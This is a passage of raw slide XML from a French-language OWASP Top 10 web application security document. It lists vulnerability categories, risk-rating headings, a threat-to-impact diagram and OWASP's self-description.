                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>erreurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Dans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Top 10 2007 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Entrée 2007-A6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Mesures</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t> anti </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>automatisation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>insuffisante</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t> (Anti-automation)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Manque de pertinence des logs et des rôles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Liée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> au Top 10 2007 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Entrée 2007-A6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Manque de système de détection/réponse aux intrusions</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                        <a:hlinkClick r:id="rId11"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>Exécution de fichier malveillant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Dans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Top 10 2007  – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>Entrée 2007-A3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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t> Affectation de masse</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Données</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>privées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>l’utilisateur</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3025209" y="3091161"/>
            <a:ext cx="688009" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Fréquence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094027" y="3091161"/>
            <a:ext cx="676788" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Repérable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1882209" y="3091161"/>
            <a:ext cx="926857" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Mise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t> en oeuvre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282634" y="3091161"/>
            <a:ext cx="518091" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="874885" y="2620973"/>
            <a:ext cx="5906914" cy="580794"/>
            <a:chOff x="87650" y="1014596"/>
            <a:chExt cx="6683698" cy="580794"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="Group 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="87650" y="1014596"/>
              <a:ext cx="6683698" cy="580794"/>
              <a:chOff x="87650" y="997424"/>
              <a:chExt cx="6683698" cy="580794"/>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rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Failles</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>         </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>sécurité</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="40" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="49"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50"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51"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52"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53"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d’attaque</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="496468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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>techniques</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="43"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6"/>
                <a:ext cx="95239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87650" y="1280701"/>
                <a:ext cx="950797"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   </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Facteurs</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  de</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>menace</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="600934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Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>commerciaux</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="48" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="42" idx="4"/>
                <a:endCxn id="47" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5650481" y="1263956"/>
                <a:ext cx="358867"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2991923"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8" name="Rectangle 37"/>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495062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4191000" y="733425"/>
            <a:ext cx="523875" cy="8953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4191000" y="2362200"/>
            <a:ext cx="609600" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="2724150"/>
            <a:ext cx="2437279" cy="13144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cstate="print"/>
          <a:srcRect l="338" t="-912" r="1098" b="232"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4724400"/>
            <a:ext cx="6858000" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="5791200"/>
            <a:ext cx="6324600" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L’Open Web Application Security Project (OWASP) est une communauté mondiale libre et ouverte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ayant pour but l'amélioration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>de la sécurité des applications logicielles. Notre mission est de rendre la sécurité des applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>« visible », </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pour que les particuliers et les entreprises puissent prendre des décisions tenant compte des risques de sécurité liés aux applications. Chacun est libre de participer à l'OWASP et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sont disponibles sous licence libre et gratuite. La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fondation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP est une association à but non lucratif de type 501c3 qui garantit la disponibilité future et le support de nos travaux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="228600"/>
            <a:ext cx="3581400" cy="2492990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>LES ICÔNES CI-DESSOUS REPRESENTENT LES AUTRES VERSIONS DE CET OUVRAGE DISPONIBLES A L'IMPRESSION. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>ALPHA: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
